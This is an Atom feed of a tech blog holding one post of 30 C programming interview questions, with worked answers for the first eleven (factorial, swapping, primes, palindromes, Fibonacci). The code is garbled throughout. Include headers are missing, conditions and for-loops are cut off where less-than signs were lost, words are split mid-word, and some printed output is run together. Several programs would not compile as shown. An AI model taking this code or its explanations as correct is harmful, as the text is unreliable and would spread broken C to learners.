<?xml version='1.0' encoding='UTF-8'?><?xml-stylesheet href="http://www.blogger.com/styles/atom.css" type="text/css"?><feed xmlns='http://www.w3.org/2005/Atom' xmlns:openSearch='http://a9.com/-/spec/opensearchrss/1.0/' xmlns:blogger='http://schemas.google.com/blogger/2008' xmlns:georss='http://www.georss.org/georss' xmlns:gd="http://schemas.google.com/g/2005" xmlns:thr='http://purl.org/syndication/thread/1.0'><id>tag:blogger.com,1999:blog-276484908558385294</id><updated>2024-11-06T08:36:39.962+05:30</updated><category term="Computer"/><category term="Windows"/><category term="Facebook"/><category term="Applications"/><category term="Android"/><category term="Google Tricks"/><category term="Browser"/><category term="Mobile"/><category term="Ethical Hacking"/><category term="Online Money"/><category term="Facebook Chatbox"/><category term="Iphone"/><category term="Facebook Status"/><category term="Programs"/><category term="Free Mobile Recharge"/><category term="Kali Linux"/><category term="Technology"/><category term="Unix/Linux"/><category term="Apple"/><category term="Blackberry"/><category term="C language"/><category term="Cricket"/><category term="Macintosh"/><category term="Twiitter"/><title type='text'>GouravInfo</title><subtitle type='html'>Make Internet Easy</subtitle><link rel='http://schemas.google.com/g/2005#feed' type='application/atom+xml' href='http://gouravinfo.blogspot.com/feeds/posts/default'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/276484908558385294/posts/default'/><link rel='alternate' type='text/html' href='http://gouravinfo.blogspot.com/'/><link rel='hub' href='http://pubsubhubbub.appspot.com/'/><link rel='next' type='application/atom+xml' href='http://www.blogger.com/feeds/276484908558385294/posts/default?start-index=26&amp;max-results=25'/><author><name>Gourav Ratnawat</name><uri>http://www.blogger.com/profile/03815155318390279322</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='32' height='32' src='//blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiIZoLmC65AXKrNABnNfxhzeowPYCsr93DX9SQDkIH_2SEiHQddadPoboFvNG0_zEDxj6lGmengwWk33scEp3cO0HegFS-kxERyTDTOrM2tMtgbhtE_4_a7jORklx4yVGs/s220/FB_IMG_1557336607561.jpg'/></author><generator version='7.00' uri='http://www.blogger.com'>Blogger</generator><openSearch:totalResults>155</openSearch:totalResults><openSearch:startIndex>1</openSearch:startIndex><openSearch:itemsPerPage>25</openSearch:itemsPerPage><entry><id>tag:blogger.com,1999:blog-276484908558385294.post-2623534071096737091</id><published>2014-10-13T00:22:00.000+05:30</published><updated>2014-10-13T00:22:13.931+05:30</updated><category scheme="http://www.blogger.com/atom/ns#" term="C language"/><category scheme="http://www.blogger.com/atom/ns#" term="Programs"/><title type='text'>Top 30 C programs asked in interview</title><content type='html'>&lt;div dir=&quot;ltr&quot; style=&quot;text-align: left;&quot; trbidi=&quot;on&quot;&gt;
&lt;div style=&quot;background-color: white; color: #141823; font-family: Helvetica, Arial, &#39;lucida grande&#39;, tahoma, verdana, arial, sans-serif; font-size: 14px; line-height: 19.3199996948242px; margin-bottom: 6px;&quot;&gt;
&lt;span style=&quot;line-height: 19.3199996948242px;&quot;&gt;Programs :&lt;/span&gt;&lt;/div&gt;
&lt;div style=&quot;background-color: white; color: #141823; font-family: Helvetica, Arial, &#39;lucida grande&#39;, tahoma, verdana, arial, sans-serif; font-size: 14px; line-height: 19.3199996948242px; margin-bottom: 6px; margin-top: 6px;&quot;&gt;
1. Write a program to find factorial of the given number...&lt;br /&gt;2. Write a program to check whether the given number is even or odd.&lt;br /&gt;3. Write a program to swap two numbers using a temporary variable.&lt;br /&gt;4. Write a program to swap two numbers without using a temporary variable.&lt;br /&gt;5. Write a program to swap two numbers using bitwise operators.&lt;br /&gt;6. Write a program to find the greatest of three numbers.&lt;br /&gt;7. Write a program to find the greatest among ten numbers.&lt;br /&gt;8. Write a program to check whether the given number is a prime.&lt;br /&gt;9. Write a program to check whether the given number is a palindrome c number.&lt;br /&gt;10.Write a program to check whether the given string is a palindrome .&lt;br /&gt;11.Write a program to generate the Fibonacci series.&lt;br /&gt;12.Write a program to print&quot;Hello World&quot;without using semicolon anywhere in the code.&lt;br /&gt;13.Write a program to print a semicolon without using a semicolon anywhere in the code.&lt;br /&gt;14.Write a program to compare two strings without using strcmp() function.&lt;br /&gt;15.Write a program to concatenat e two strings without using strcat() function.&lt;br /&gt;16.Write a program to delete a specified line from a text file.&lt;br /&gt;17.Write a program to replace a specified line in a text file.&lt;br /&gt;18.Write a program to find the number of lines in a text file..&lt;br /&gt;19.Write a C program which asks the user for a number between 1 to 9 and shows the number. If the user&lt;br /&gt;inputs a number out of the specified range, the program should show an error and prompt the user for a&lt;br /&gt;valid input.&lt;br /&gt;20.Write a program to display the multiplica tion table of a given number..&lt;br /&gt;21.WAP to check a string is Caliondrom e or not. // Maventic question.&lt;br /&gt;22.WAP to print DONE,witho ut using any loop. // asked to my frnd in any company.&lt;br /&gt;23.WAP to print DONE,witho ut using any loop and any conditonal clause or operators. // asked to me as a cross question of 22th question by the person i asked 22th ques.&lt;br /&gt;24. WAP to find out the longest word in a string.&lt;br /&gt;25.Prog of WORLD MAP. // this code was written by someone,i forgot his name,he won award for this code as short and best c code. JUST FOR FUN //&lt;br /&gt;26.WAP to print the triangle of letters in increasing order of lines..&lt;br /&gt;27.WAP to print&#39;xay&#39;in place of every&#39;a&#39;in a string.// DOC Update on 24-jan-12.&lt;br /&gt;28.Count the Total Number of 7 comming between 1 to 100.&lt;br /&gt;/* I made this code in a way that u can give Upper limit i.e. 100,Lower limit i.e. 1 and the specific number u wants to count in between i.e. 7 */ // asked by: Vishwa Pratap Rana..&lt;br /&gt;29. Code for duplicate&#39; s removal,by Amit Aru.. // Similar question was asked in Maventic 2nd round to me,,&lt;br /&gt;30. WAP to find out if a given number is a power series of 2 or not,withou t any loop and without using % modulo operator.. // asked by someone on BJS..&lt;/div&gt;
&lt;div style=&quot;background-color: white; color: #141823; font-family: Helvetica, Arial, &#39;lucida grande&#39;, tahoma, verdana, arial, sans-serif; font-size: 14px; line-height: 19.3199996948242px; margin-bottom: 6px; margin-top: 6px;&quot;&gt;
TO BE CONTINUED. ..!!!&lt;/div&gt;
&lt;div style=&quot;background-color: white; color: #141823; font-family: Helvetica, Arial, &#39;lucida grande&#39;, tahoma, verdana, arial, sans-serif; font-size: 14px; line-height: 19.3199996948242px; margin-bottom: 6px; margin-top: 6px;&quot;&gt;
ANSWERS&lt;/div&gt;
&lt;div style=&quot;background-color: white; color: #141823; font-family: Helvetica, Arial, &#39;lucida grande&#39;, tahoma, verdana, arial, sans-serif; font-size: 14px; line-height: 19.3199996948242px; margin-bottom: 6px; margin-top: 6px;&quot;&gt;
1. Write a program to find factorial of the given number.&lt;br /&gt;Recursion: A function is called&#39;recursive &#39;if a statement within the body of a function calls the same function. It&lt;br /&gt;is also called&#39;circular definition &#39;. Recursion is thus a process of defining something in terms of itself.&lt;br /&gt;Program: To calculate the factorial value using recursion.&lt;br /&gt;&lt;a class=&quot;_58cn&quot; data-ft=&quot;{&amp;quot;tn&amp;quot;:&amp;quot;*N&amp;quot;,&amp;quot;type&amp;quot;:104}&quot; href=&quot;https://www.c.facebook.com/hashtag/include?source=feed_text&amp;amp;story_id=552822908099925&quot; style=&quot;color: #3b5998; cursor: pointer; text-decoration: none;&quot;&gt;&lt;span class=&quot;_58cl&quot; style=&quot;color: #6d84b4;&quot;&gt;‪#‎&lt;/span&gt;&lt;span class=&quot;_58cm&quot;&gt;include‬&lt;/span&gt;&lt;/a&gt;&lt;br /&gt;int fact(int n);&lt;br /&gt;int main(){&lt;br /&gt;int x, i;&lt;br /&gt;printf(&quot;En ter a value for x: \n&quot;);&lt;br /&gt;scanf(&quot;%d&quot; ,&amp;amp;x);&lt;br /&gt;i = fact(x);&lt;br /&gt;printf(&quot;\n Factorial of %d is %d&quot;, x, i);&lt;br /&gt;return 0;&lt;br /&gt;}int fact(int n){&lt;br /&gt;/* n=0 indicates a terminatin g condition */&lt;br /&gt;if (n&lt;br /&gt;return (1);&lt;br /&gt;}else{&lt;br /&gt;/* function calling itself */&lt;br /&gt;return (n * fact(n - 1));&lt;br /&gt;/*n*fact(n -1) is a recursive expression */&lt;br /&gt;}&lt;br /&gt;}&lt;br /&gt;Output:&lt;br /&gt;Enter a value for x:&lt;br /&gt;4&lt;br /&gt;Factorial of 4 is 24&lt;br /&gt;Explanatio n:&lt;br /&gt;fact(n) = n * fact(n-1)&lt;br /&gt;If n=4&lt;br /&gt;fact(4) = 4 * fact(3) there is a call to fact(3)&lt;br /&gt;fact(3) = 3 * fact(2)&lt;br /&gt;fact(2) = 2 * fact(1)&lt;br /&gt;fact(1) = 1 * fact(0)&lt;br /&gt;fact(0) = 1&lt;br /&gt;fact(1) = 1 * 1 = 1&lt;br /&gt;fact(2) = 2 * 1 = 2&lt;br /&gt;fact(3) = 3 * 2 = 6&lt;br /&gt;Thus fact(4) = 4 * 6 = 24&lt;br /&gt;Terminatin g condition( n&lt;br /&gt;infinite loop.&lt;/div&gt;
&lt;div style=&quot;background-color: white; color: #141823; font-family: Helvetica, Arial, &#39;lucida grande&#39;, tahoma, verdana, arial, sans-serif; font-size: 14px; line-height: 19.3199996948242px; margin-bottom: 6px; margin-top: 6px;&quot;&gt;
2. Write a program to check whether the given number is even or odd.&lt;br /&gt;Program:&lt;br /&gt;#include&lt;br /&gt;int main(){&lt;br /&gt;int a;&lt;br /&gt;printf(&quot;En ter a: \n&quot;);&lt;br /&gt;scanf(&quot;%d&quot; ,&amp;amp;a);&lt;br /&gt;/* logic */&lt;br /&gt;if (a % 2 == 0){&lt;br /&gt;printf(&quot;Th e given number is EVEN\n&quot;);&lt;br /&gt;}&lt;br /&gt;else{&lt;br /&gt;printf(&quot;Th e given number is ODD\n&quot;);&lt;br /&gt;}&lt;br /&gt;return 0;&lt;br /&gt;}&lt;br /&gt;Output:&lt;br /&gt;Enter a: 2&lt;br /&gt;The given number is EVEN&lt;br /&gt;Explanatio n with examples:&lt;br /&gt;Example 1: If entered number is an even number&lt;br /&gt;Let value of&#39;a&#39;entered is 4&lt;br /&gt;if(a%2==0) then a is an even number, else odd.&lt;br /&gt;i.e. if(4%2==0) then 4 is an even number, else odd.&lt;br /&gt;To check whether 4 is even or odd, we need to calculate (4%2).&lt;br /&gt;/* % (modulus) implies remainder value. */&lt;br /&gt;/* Therefore if the remainder obtained when 4 is divided by 2 is 0, then 4 is even. */&lt;br /&gt;4%2==0 is true&lt;br /&gt;Thus 4 is an even number.&lt;br /&gt;Example 2: If entered number is an odd number.&lt;br /&gt;Let value of&#39;a&#39;entered is 7&lt;br /&gt;if(a%2==0) then a is an even number, else odd.&lt;br /&gt;i.e. if(7%2==0) then 4 is an even number, else odd.&lt;br /&gt;To check whether 7 is even or odd, we need to calculate (7%2).&lt;br /&gt;7%2==0 is false /* 7%2==1 condition fails and else part is executed */&lt;br /&gt;Thus 7 is an odd number.&lt;/div&gt;
&lt;div style=&quot;background-color: white; color: #141823; font-family: Helvetica, Arial, &#39;lucida grande&#39;, tahoma, verdana, arial, sans-serif; font-size: 14px; line-height: 19.3199996948242px; margin-bottom: 6px; margin-top: 6px;&quot;&gt;
3. Write a program to swap two numbers using a temporary variable.&lt;br /&gt;Swapping interchang es the values of two given variables.&lt;br /&gt;Logic:&lt;br /&gt;step1: temp=x;&lt;br /&gt;step2: x=y;&lt;br /&gt;step3: y=temp;&lt;br /&gt;Example:&lt;br /&gt;if x=5 and y=8, consider a temporary variable temp.&lt;br /&gt;step1: temp=x=5;&lt;br /&gt;step2: x=y=8;&lt;br /&gt;step3: y=temp=5;&lt;br /&gt;Thus the values of the variables x and y are interchang ed.&lt;br /&gt;Program:&lt;br /&gt;#include&lt;br /&gt;int main(){&lt;br /&gt;int a, b, temp;&lt;br /&gt;printf(&quot;En ter the value of a and b: \n&quot;);&lt;br /&gt;scanf(&quot;%d %d&quot;,&amp;amp;a,&amp;amp;b);&lt;br /&gt;printf(&quot;Be fore swapping a=%d, b=%d \n&quot;, a, b);&lt;br /&gt;/*Swapping logic */&lt;br /&gt;temp = a;&lt;br /&gt;a = b;&lt;br /&gt;b = temp;&lt;br /&gt;printf(&quot;Af ter swapping a=%d, b=%d&quot;, a, b);&lt;br /&gt;return 0;&lt;br /&gt;}&lt;br /&gt;Output:&lt;br /&gt;Enter the values of a and b: 2 3&lt;br /&gt;Before swapping a=2, b=3&lt;br /&gt;After swapping a=3, b=2&lt;br /&gt;4. Write a program to swap two numbers without using a temporary variable.&lt;br /&gt;Swapping interchang es the values of two given variables.&lt;br /&gt;Logic:&lt;br /&gt;step1: x=x+y;&lt;br /&gt;step2: y=x-y;&lt;br /&gt;step3: x=x-y;&lt;br /&gt;Example:&lt;br /&gt;if x=7 and y=4&lt;br /&gt;step1: x=7+4=11;&lt;br /&gt;step2: y=11-4=7;&lt;br /&gt;step3: x=11-7=4;&lt;br /&gt;Thus the values of the variables x and y are interchang ed.&lt;br /&gt;Program:&lt;br /&gt;#include&lt;br /&gt;int main(){&lt;br /&gt;int a, b;&lt;br /&gt;printf(&quot;En ter values of a and b: \n&quot;);&lt;br /&gt;scanf(&quot;%d %d&quot;,&amp;amp;a,&amp;amp;b);&lt;br /&gt;printf(&quot;Be fore swapping a=%d, b=%d\n&quot;, a,b);&lt;br /&gt;/*Swapping logic */&lt;br /&gt;a = a + b;&lt;br /&gt;b = a - b;&lt;br /&gt;a = a - b;&lt;br /&gt;printf(&quot;Af ter swapping a=%d b=%d\n&quot;, a, b);&lt;br /&gt;return 0;&lt;br /&gt;}&lt;br /&gt;Output:&lt;br /&gt;Enter values of a and b: 2 3&lt;br /&gt;Before swapping a=2, b=3&lt;br /&gt;The values after swapping are a=3 b=2&lt;/div&gt;
&lt;div style=&quot;background-color: white; color: #141823; font-family: Helvetica, Arial, &#39;lucida grande&#39;, tahoma, verdana, arial, sans-serif; font-size: 14px; line-height: 19.3199996948242px; margin-bottom: 6px; margin-top: 6px;&quot;&gt;
5. Write a program to swap two numbers using bitwise operators.&lt;br /&gt;Program:&lt;br /&gt;#include&lt;br /&gt;int main(){&lt;br /&gt;int i = 65;&lt;br /&gt;int k = 120;&lt;br /&gt;printf(&quot;\n value of i=%d k=%d before swapping&quot;, i, k);&lt;br /&gt;i = i ^ k;&lt;br /&gt;k = i ^ k;&lt;br /&gt;i = i ^ k;&lt;br /&gt;printf(&quot;\n value of i=%d k=%d after swapping&quot;, i, k);&lt;br /&gt;return 0;&lt;br /&gt;}&lt;br /&gt;Explanatio n:&lt;br /&gt;i = 65; binary equivalent of 65 is 0100 0001&lt;br /&gt;k = 120; binary equivalent of 120 is 0111 1000&lt;br /&gt;i = i^k;&lt;br /&gt;i...0100 0001&lt;br /&gt;k...0111 1000&lt;br /&gt;---------&lt;br /&gt;val of i = 0011 1001&lt;br /&gt;---------&lt;br /&gt;k = i^k&lt;br /&gt;i...0011 1001&lt;br /&gt;k...0111 1000&lt;br /&gt;---------&lt;br /&gt;val of k = 0100 0001 binary equivalent of this is 65&lt;br /&gt;---------( that is the initial value of i)&lt;br /&gt;i = i^k&lt;br /&gt;i...0011 1001&lt;br /&gt;k...0100 0001&lt;br /&gt;---------&lt;br /&gt;val of i = 0111 1000 binary equivalent of this is 120&lt;br /&gt;--------- (that is the initial value of k)&lt;/div&gt;
&lt;div style=&quot;background-color: white; color: #141823; font-family: Helvetica, Arial, &#39;lucida grande&#39;, tahoma, verdana, arial, sans-serif; font-size: 14px; line-height: 19.3199996948242px; margin-bottom: 6px; margin-top: 6px;&quot;&gt;
6. Write a program to find the greatest of three numbers.&lt;br /&gt;Program:&lt;br /&gt;#include&lt;br /&gt;int main(){&lt;br /&gt;int a, b, c;&lt;br /&gt;printf(&quot;En ter a,b,c: \n&quot;);&lt;br /&gt;scanf(&quot;%d %d %d&quot;,&amp;amp;a,&amp;amp;b,&amp;amp;c);&lt;br /&gt;if (a&amp;gt;b&amp;amp;&amp;amp;a&amp;gt;c){&lt;br /&gt;printf(&quot;a is Greater than b and c&quot;);&lt;br /&gt;}&lt;br /&gt;else if (b&amp;gt;a&amp;amp;&amp;amp;b&amp;gt;c){&lt;br /&gt;printf(&quot;b is Greater than a and c&quot;);&lt;br /&gt;}&lt;br /&gt;else if (c&amp;gt;a&amp;amp;&amp;amp;c&amp;gt;b){&lt;br /&gt;printf(&quot;c is Greater than a and b&quot;);&lt;br /&gt;}&lt;br /&gt;else{&lt;br /&gt;printf(&quot;al l are equal or any two values are equal&quot;);&lt;br /&gt;}&lt;br /&gt;return 0;&lt;br /&gt;}&lt;br /&gt;Output:&lt;br /&gt;Enter a,b,c: 3 5 8&lt;br /&gt;c is Greater than a and b&lt;br /&gt;Explanatio n with examples:&lt;br /&gt;Consider three numbers a=5,b=4,c= 8&lt;br /&gt;if(a&amp;gt;b&amp;amp;&amp;amp;a&amp;gt;c) then a is greater than b and c&lt;br /&gt;now check this condition for the three numbers 5,4,8 i.e.&lt;br /&gt;if(5&amp;gt;4&amp;amp;&amp;amp;5&amp;gt;8) /* 5&amp;gt;4 is true but 5&amp;gt;8 fails */&lt;br /&gt;so the control shifts to else if condition&lt;br /&gt;else if(b&amp;gt;a&amp;amp;&amp;amp;b&amp;gt;c) then b is greater than a and c&lt;br /&gt;now checking this condition for 5,4,8 i.e.&lt;br /&gt;else if(4&amp;gt;5&amp;amp;&amp;amp;4&amp;gt;8) / * both the conditions fail */&lt;br /&gt;now the control shifts to the next else if condition&lt;br /&gt;else if(c&amp;gt;a&amp;amp;&amp;amp;c&amp;gt;b) then c is greater than a and b&lt;br /&gt;now checking this condition for 5,4,8 i.e.&lt;br /&gt;else if(8&amp;gt;5&amp;amp;&amp;amp;8&amp;gt;4) / * both conditions are satisfied */&lt;br /&gt;Thus c is greater than a and b.&lt;/div&gt;
&lt;div style=&quot;background-color: white; color: #141823; font-family: Helvetica, Arial, &#39;lucida grande&#39;, tahoma, verdana, arial, sans-serif; font-size: 14px; line-height: 19.3199996948242px; margin-bottom: 6px; margin-top: 6px;&quot;&gt;
7. Write a program to find the greatest among ten numbers.&lt;br /&gt;Program:&lt;br /&gt;#include&lt;br /&gt;int main(){&lt;br /&gt;int a[10];&lt;br /&gt;int i;&lt;br /&gt;int greatest;&lt;br /&gt;printf(&quot;En ter ten values:&quot;);&lt;br /&gt;//Store 10 numbers in an array&lt;br /&gt;for (i = 0; i&amp;lt;10; i++){&lt;br /&gt;scanf(&quot;%d&quot; ,&amp;amp;a[i]);&lt;br /&gt;}&lt;br /&gt;//Assume that a[0] is greatest&lt;br /&gt;greatest = a[0];&lt;br /&gt;for (i = 0; i&amp;lt;10; i++){&lt;br /&gt;if (a[i]&amp;gt;greatest){&lt;br /&gt;greatest = a[i];&lt;br /&gt;}&lt;br /&gt;}&lt;br /&gt;printf(&quot;\n Greatest of ten numbers is %d&quot;, greatest);&lt;br /&gt;return 0;&lt;br /&gt;}&lt;br /&gt;Output:&lt;br /&gt;Enter ten values: 2 53 65 3 88 8 14 5 77 64 Greatest of ten numbers is 88&lt;br /&gt;Explanatio n with example:&lt;br /&gt;Entered values are 2, 53, 65, 3, 88, 8, 14, 5, 77, 64&lt;br /&gt;They are stored in an array of size 10. let a[] be an array holding these values.&lt;br /&gt;/* how the greatest among ten numbers is found */&lt;br /&gt;Let us consider a variable&#39;greatest&#39; . At the beginning of the loop, variable&#39;greatest&#39; is assinged with the value of&lt;br /&gt;first element in the array greatest=a [0]. Here variable&#39;greatest&#39; is assigned 2 as a[0]=2.&lt;br /&gt;Below loop is executed until end of the array&#39;a[]&#39;;.&lt;br /&gt;for(i=0; i&lt;br /&gt;{&lt;br /&gt;if(a[i]&amp;gt;gr eatest)&lt;br /&gt;{&lt;br /&gt;greatest= a[i];&lt;br /&gt;}&lt;br /&gt;}&lt;br /&gt;For each value of&#39;i&#39;, value of a[i] is compared with value of variable&#39;greatest&#39; . If any value greater than the value&lt;br /&gt;of&#39;greatest&#39; is encountere d, it would be replaced by a[i]. After completion of&#39;for&#39;loop, the value of variable&lt;br /&gt;&#39;greatest&#39; holds the greatest number in the array. In this case 88 is the greatest of all the numbers.&lt;br /&gt;8. Write a program to check whether the given number is a prime.&lt;br /&gt;A prime number is a natural number that has only one and itself as factors. Examples: 2, 3, 13 are prime&lt;br /&gt;numbers.&lt;br /&gt;Program:&lt;br /&gt;#include&lt;br /&gt;main(){&lt;br /&gt;int n, i, c = 0;&lt;br /&gt;printf(&quot;En ter any number n: \n&quot;);&lt;br /&gt;scanf(&quot;%d&quot; ,&amp;amp;n);&lt;br /&gt;/*logic*/&lt;br /&gt;for (i = 1; i&lt;br /&gt;if (n % i == 0){&lt;br /&gt;c++;&lt;br /&gt;}&lt;br /&gt;}&lt;br /&gt;if (c == 2){&lt;br /&gt;printf(&quot;n is a Prime number&quot;);&lt;br /&gt;}&lt;br /&gt;else{&lt;br /&gt;printf(&quot;n is not a Prime number&quot;);&lt;br /&gt;}&lt;br /&gt;return 0;&lt;br /&gt;}&lt;br /&gt;Output:&lt;br /&gt;Enter any number n: 7&lt;br /&gt;n is Prime&lt;br /&gt;Explanatio n with examples:&lt;br /&gt;consider a number n=5&lt;br /&gt;for(i=0;i&lt;br /&gt;i.e. for(i=0;i&lt;br /&gt;1st iteration: i=1;i&lt;br /&gt;here i is incremente d i.e. i value for next iteration is 2&lt;br /&gt;now if(n%i==0) then c is incremente d&lt;br /&gt;i.e.if(5%1 ==0)then c is incremente d, here 5%1=0 thus c is incremente d.&lt;br /&gt;now c=1;&lt;br /&gt;2nd iteration: i=2;i&lt;br /&gt;here i is incremente d i.e. i value for next iteration is 3&lt;br /&gt;now if(n%i==0) then c is incremente d&lt;br /&gt;i.e.if(5%2 ==0) then c is incremente d, but 5%2!=0 and so c is not incremente d, c remains 1&lt;br /&gt;c=1;&lt;br /&gt;3rd iteration: i=3;i&lt;br /&gt;here i is incremente d i.e. i value for next iteration is 4&lt;br /&gt;now if(n%i==0) then c is incremente d&lt;br /&gt;i.e.if(5%3 ==0) then c ic incremente d, but 5%3!=0 and so c is not incremente d, c remains 1&lt;br /&gt;c=1;&lt;br /&gt;4th iteration: i=4;i&lt;br /&gt;here i is incremente d i.e. i value for next iteration is 5&lt;br /&gt;now if(n%i==0) then c is incremente d&lt;br /&gt;i.e. if(5%4==0) then c is incremente d, but 5%4!=0 and so c is not incremente d, c remains 1&lt;br /&gt;c=1;&lt;br /&gt;5th iteration: i=5;i&lt;br /&gt;here i is incremente d i.e. i value for next iteration is 6&lt;br /&gt;now if(n%i==0) then c is incremente d&lt;br /&gt;i.e. if(5%5==0) then c is incremente d, 5%5=0 and so c is incremente d.&lt;br /&gt;i.e. c=2&lt;br /&gt;6th iteration: i=6;i&lt;br /&gt;here i value is 6 and 6&lt;br /&gt;now if(c==2) then n is a prime number&lt;br /&gt;we have c=2 from the 5th iteration and thus n=5 is a Prime number.&lt;/div&gt;
&lt;div style=&quot;background-color: white; color: #141823; font-family: Helvetica, Arial, &#39;lucida grande&#39;, tahoma, verdana, arial, sans-serif; font-size: 14px; line-height: 19.3199996948242px; margin-bottom: 6px; margin-top: 6px;&quot;&gt;
9. Write a program to check whether the given number is a palindromi c number.&lt;br /&gt;If a number, which when read in both forward and backward way is same, then such a number is called a&lt;br /&gt;palindrome number.&lt;br /&gt;Program:&lt;br /&gt;#include&lt;br /&gt;int main(){&lt;br /&gt;int n, n1, rev = 0, rem;&lt;br /&gt;printf(&quot;En ter any number: \n&quot;);&lt;br /&gt;scanf(&quot;%d&quot; ,&amp;amp;n);&lt;br /&gt;n1 = n;&lt;br /&gt;/* logic */&lt;br /&gt;while (n&amp;gt;0){&lt;br /&gt;rem = n % 10;&lt;br /&gt;rev = rev * 10 + rem;&lt;br /&gt;n = n / 10;&lt;br /&gt;}&lt;br /&gt;if (n1 == rev){&lt;br /&gt;printf(&quot;Gi ven number is a palindromi c number&quot;);&lt;br /&gt;}&lt;br /&gt;else{&lt;br /&gt;printf(&quot;Gi ven number is not a palindromi c number&quot;);&lt;br /&gt;}&lt;br /&gt;return 0;&lt;br /&gt;}&lt;br /&gt;Output:&lt;br /&gt;Enter any number: 121&lt;br /&gt;Given number is a palindrome&lt;br /&gt;Explanatio n with an example:&lt;br /&gt;Consider a number n=121, reverse=0, remainder;&lt;br /&gt;number=121&lt;br /&gt;now the while loop is executed /* the condition (n&amp;gt;0) is satisfied */&lt;br /&gt;/* calculate remainder */&lt;br /&gt;remainder of 121 divided by 10=(121%10 )=1;&lt;br /&gt;now reverse=(r everse*10) +remainder&lt;br /&gt;=(0*10)+1 / * we have initialized reverse=0 */&lt;br /&gt;=1&lt;br /&gt;number=num ber/10&lt;br /&gt;=121/10&lt;br /&gt;=12&lt;br /&gt;now the number is 12, greater than 0. The above process is repeated for number=12.&lt;br /&gt;remainder= 12%10=2;&lt;br /&gt;reverse=(1 *10)+2=12;&lt;br /&gt;number=12/ 10=1;&lt;br /&gt;now the number is 1, greater than 0. The above process is repeated for number=1.&lt;br /&gt;remainder= 1%10=1;&lt;br /&gt;reverse=(1 2*10)+1=12 1;&lt;br /&gt;number=1/ 10 / * the condition n&amp;gt;0 is not satisfied,co ntrol leaves the while loop */&lt;br /&gt;Program stops here. The given number=121 equals the reverse of the number. Thus the given number is a&lt;br /&gt;palindrome number.&lt;/div&gt;
&lt;div style=&quot;background-color: white; color: #141823; font-family: Helvetica, Arial, &#39;lucida grande&#39;, tahoma, verdana, arial, sans-serif; font-size: 14px; line-height: 19.3199996948242px; margin-bottom: 6px; margin-top: 6px;&quot;&gt;
10.Write a program to check whether the given string is a palindrome .&lt;br /&gt;Palindrome is a string, which when read in both forward and backward way is same.&lt;br /&gt;Example: radar, madam, pop, lol, rubber, etc.,&lt;br /&gt;Program:&lt;br /&gt;#include&lt;br /&gt;#include&lt;br /&gt;int main(){&lt;br /&gt;char string1[20 ];&lt;br /&gt;int i, length;&lt;br /&gt;int flag = 0;&lt;br /&gt;printf(&quot;En ter a string: \n&quot;);&lt;br /&gt;scanf(&quot;%s&quot; , string1);&lt;br /&gt;length = strlen(str ing1);&lt;br /&gt;for(i=0;i&amp;lt;length ;i++){&lt;br /&gt;if(string1 [i] != string1[le ngth-i-1]) {&lt;br /&gt;flag = 1;&lt;br /&gt;break;&lt;br /&gt;}&lt;br /&gt;}&lt;br /&gt;if (flag){&lt;br /&gt;printf(&quot;%s is not a palindrome \n&quot;, string1);&lt;br /&gt;}&lt;br /&gt;else{&lt;br /&gt;printf(&quot;%s is a palindrome \n&quot;, string1);&lt;br /&gt;}&lt;br /&gt;return 0;&lt;br /&gt;}&lt;br /&gt;Output:&lt;br /&gt;Enter a string: radar&lt;br /&gt;&quot;radar&quot;is a palindrome&lt;br /&gt;Explanatio n with example:&lt;br /&gt;To check if a string is a palindrome or not, a string needs to be compared with the reverse of itself.&lt;br /&gt;Consider a palindrome string:&quot;radar&quot;,&lt;br /&gt;---------- ---------- -------&lt;br /&gt;index: 0 1 2 3 4&lt;br /&gt;value: r a d a r&lt;br /&gt;---------- ---------- -------&lt;br /&gt;To compare it with the reverse of itself, the following logic is used:&lt;br /&gt;0th character in the char array, string1 is same as 4th character in the same string.&lt;br /&gt;1st character is same as 3rd character.&lt;br /&gt;2nd character is same as 2nd character.&lt;br /&gt;. . . .&lt;br /&gt;ith character is same as&#39;length-i- 1&#39;th character.&lt;br /&gt;If any one of the above condition fails, flag is set to true(1), which implies that the string is not a palindrome .&lt;br /&gt;By default, the value of flag is false(0). Hence, if all the conditions are satisfied, the string is a palindrome .&lt;/div&gt;
&lt;div style=&quot;background-color: white; color: #141823; font-family: Helvetica, Arial, &#39;lucida grande&#39;, tahoma, verdana, arial, sans-serif; font-size: 14px; line-height: 19.3199996948242px; margin-bottom: 6px; margin-top: 6px;&quot;&gt;
11.Write a program to generate the Fibonacci series.&lt;br /&gt;Fibonacci series: Any number in the series is obtained by adding the previous two numbers of the series.&lt;br /&gt;Let f(n) be n&#39;th term.&lt;br /&gt;f(0)=0;&lt;br /&gt;f(1)=1;&lt;br /&gt;f(n)=f(n-1 )+f(n-2); (for n&amp;gt;=2)&lt;br /&gt;Series is as follows&lt;br /&gt;011&lt;br /&gt;(1+0)&lt;br /&gt;2 (1+1)&lt;br /&gt;3 (1+2)&lt;br /&gt;5 (2+3)&lt;br /&gt;8 (3+5)&lt;br /&gt;13 (5+8)&lt;br /&gt;21 (8+13)&lt;br /&gt;34 (13+21)&lt;br /&gt;...and so on&lt;br /&gt;Program: to generate Fibonacci Series(10 terms)&lt;br /&gt;#include&lt;br /&gt;int main(){&lt;br /&gt;//array fib stores numbers of fibonacci series&lt;br /&gt;int i, fib[25];&lt;br /&gt;// initialized first element to 0&lt;br /&gt;fib[0] = 0;&lt;br /&gt;// initialized second element to 1&lt;br /&gt;fib[1] = 1;&lt;br /&gt;//loop to generate ten elements&lt;br /&gt;for (i = 2; i&amp;lt;10; i++){&lt;br /&gt;//i&#39;th element of series is equal to the sum of i-1&#39;th element and i-2&#39;th element.&lt;br /&gt;fib[i] = fib[i - 1] + fib[i - 2];&lt;br /&gt;}&lt;br /&gt;printf(&quot;Th e fibonacci series is as follows \n&quot;);&lt;br /&gt;//print all numbers in the series&lt;br /&gt;for (i = 0; i&amp;lt;10; i++){&lt;br /&gt;printf(&quot;%d \n&quot;, fib[i]);&lt;br /&gt;}&lt;br /&gt;return 0;&lt;br /&gt;}&lt;br /&gt;Output:&lt;br /&gt;The fibonacci series is as follows&lt;br /&gt;01123581&lt;br /&gt;3&lt;br /&gt;21&lt;br /&gt;34&lt;br /&gt;Explanatio n:&lt;br /&gt;The first two elements are initialize d to 0, 1 respective ly. Other elements in the series are generated by looping&lt;br /&gt;and adding previous two numbes. These numbers are stored in an array and ten elements of the series are&lt;br /&gt;printed as output.&lt;/div&gt;
